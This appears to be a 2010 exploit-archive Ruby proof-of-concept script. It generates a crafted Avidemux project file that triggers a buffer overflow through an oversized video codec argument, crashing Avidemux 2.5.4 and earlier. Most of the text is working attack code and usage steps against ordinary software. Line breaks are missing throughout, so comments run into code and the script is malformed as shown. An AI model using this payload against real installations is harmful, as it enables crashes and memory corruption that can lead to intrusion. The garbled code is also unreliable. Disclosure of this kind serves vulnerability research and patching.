#!/usr/bin/env ruby# avidemux_crash.rb## Title : Avidemux <= 2.5.4 Buffer Overflow PoC# Date : 31.10.2010# Version : <= 2.5.4# Software Link : http://avidemux.sourceforge.net/download.html / http://avidemux.razorbyte.com.au/# Author : The_UnKn@wn# Email : the_unknown [at] group51 [dot] org# Homepage : http://group51.org# Tested on : openSUSE 11.3 and Windows XP SP3 English## Usage:# ruby avidemux_crash.rb <a *.mpg file># Start Avidemux --> Load/Run Project --> crash!!## Note:# You can also use another video file format you would have to change the Format in Line and maybe some other stuff #54 too#
file = ARGV[0]if file.nil?
puts "Usage: ruby #{__FILE__} <path to sample video .mpg file>"exitend
name = "avidemux.prj"
text = "//AD<- Needed to identify//\n"+"//--automatically built--\n"+"var app = new Avidemux();\n"+"//** Video **\n"+"// 01 videos source \n"+"app.load(\"#{file}\");\n"+"//01 segments:\n"+"app.clearSegments();\n"+"app.addSegment(0,0,157699);\n"+"app.markerA=0;\n"+"app.markerB=77543;\n"+"app.rebuildIndex();\n"+"//** Postproc **\n"+"app.video.setPostProc(3,3,0);\n"+"app.video.fps1000 = 25000;\n"+"//** Filters **\n"+"//** Video Codec conf **\n"+"app.video.codec(\"Copy\", \"CQ=4\", \"200 \"); \n"+# <-- here is the vuln app.video.codec("Copy","CQ=4","0 ");"//** Audio **\n"+"app.audio.reset();\n"+"app.audio.codec(\"copy\",-1078515528,0,\"\");\n"+"app.audio.normalizeMode=0;\n"+"app.audio.normalizeValue=0;\n"+"app.audio.delay=0;\n"+"app.audio.mixer=\"NONE\";\n"+"app.setContainer(\"AVI\");\n"+"setSuccess(1);\n"+"//app.Exit();\n"+"//End of script"
File.open(name,"w")do|f|
f.puts(text)end
puts "File #{name} has been created successfully"
